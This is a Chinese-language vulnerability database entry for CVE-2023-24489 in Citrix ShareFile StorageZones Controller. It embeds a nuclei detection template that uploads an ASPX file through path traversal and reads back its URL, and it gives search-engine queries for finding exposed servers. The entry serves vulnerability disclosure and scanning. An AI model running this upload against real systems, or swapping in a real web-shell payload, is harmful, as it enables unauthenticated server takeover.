漏洞信息 漏洞名称: Citrix ShareFile StorageZones Controller 远程代码执行漏洞
漏洞编号:
漏洞类型: 命令执行
漏洞等级: 严重
漏洞描述: Citrix ShareFile StorageZones Controller是Citrix提供的一个企业级文件共享和同步解决方案,广泛应用于需要安全文件传输和存储的企业环境中。该产品允许用户在企业内部或云端安全地存储、同步和共享文件。此次发现的漏洞影响客户管理的ShareFile存储区域控制器。
漏洞的根源在于客户管理的ShareFile存储区域控制器中存在一个未经验证的远程代码执行漏洞。攻击者可以无需认证,通过构造特殊的HTTP请求,利用文件上传功能中的路径遍历漏洞,将恶意文件上传到服务器上的任意位置,进而执行任意代码。这一漏洞的技术原因在于服务器未能正确验证和处理用户上传的文件路径,导致攻击者可以绕过安全限制,上传并执行恶意脚本。
该漏洞的影响极为严重,攻击者可以利用此漏洞在受影响的系统上执行任意代码,完全控制系统。由于攻击无需认证,且可以远程执行,因此漏洞的利用门槛低,危害性大。成功的利用可能导致数据泄露、服务中断,甚至可以作为进一步攻击企业内部网络的跳板。鉴于Citrix ShareFile在企业中的广泛应用,该漏洞的潜在影响范围广泛,需要立即采取修补措施。
产品厂商: Citrix
产品名称: ShareFile StorageZones Controller
影响版本: *
搜索语法: title=”sharefile storage server”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/b7c60754265d41e02af8d5ea7c8a40acba9a6233/http%2Fcves%2F2023%2FCVE-2023-24489.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 id: CVE-202 3-24489 info: name: Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution author: DhiyaneshDK,dwisiswant0 severity: critical description: | A vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-24489 - https:// blog.assetnote.io/ 2023 / 07 / 04 / citrix-sharefile-rce/ - https://support.citrix.com/article/CTX559517/sharefile-storagezones-controller-security-update-for-cve202324489 - https://github.com/20142995/sectool - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors classification: cvss-metrics: CVSS:3.1 / AV:N/ AC:L/ PR:N/ UI:N/ S:U/ C:H/ I:H/ A:H cvss-score: 9.8 cve-id: CVE-202 3-24489 cwe-id: CWE-284 ,NVD-CWE-Other epss-score: 0.94389 epss-percentile: 0.99965 cpe: cpe:2.3 :a:citrix:sharefile_storage_zones_controller:* :* :* :* :* :* :* :* metadata: verified: true max-request: 256 vendor: citrix product: sharefile_storage_zones_controller shodan-query: - title:"ShareFile Storage Server" - http.title:"sharefile storage server" fofa-query: title= "sharefile storage server" google-query: intitle:"sharefile storage server" tags: cve2023,cve,sharefile,rce,intrusive,fileupload,fuzz,kev,citrixvariables: fileName: '{{rand_base(8 )}}'http: - raw: - | POST / documentum/ upload.aspx? parentid= {{url_encode(padding)}}&raw= 1 &unzip= on&uploadid= {{fileName}}\..\..\..\cifs&filename= {{fileName}}.aspx HTTP/1.1 Host: {{Hostname}} < %@ Page Language= "C#" Debug= "true" Trace= "false" %> < script Language= "c#" runat= "server" > void Page_Load(object sender, EventArgs e) { Response.Write("{{randstr}}" ); } < / script> payloads: padding: helpers/payloads/citrix_paddings.txt stop-at-first-match: true matchers: - type: dsl dsl: - 'body == "ERROR: The method or operation is not implemented." ' - 'status_code == 200 ' condition: and extractors: - type: dsl dsl: - 'BaseURL+ "/cifs/" + fileName + ".aspx" '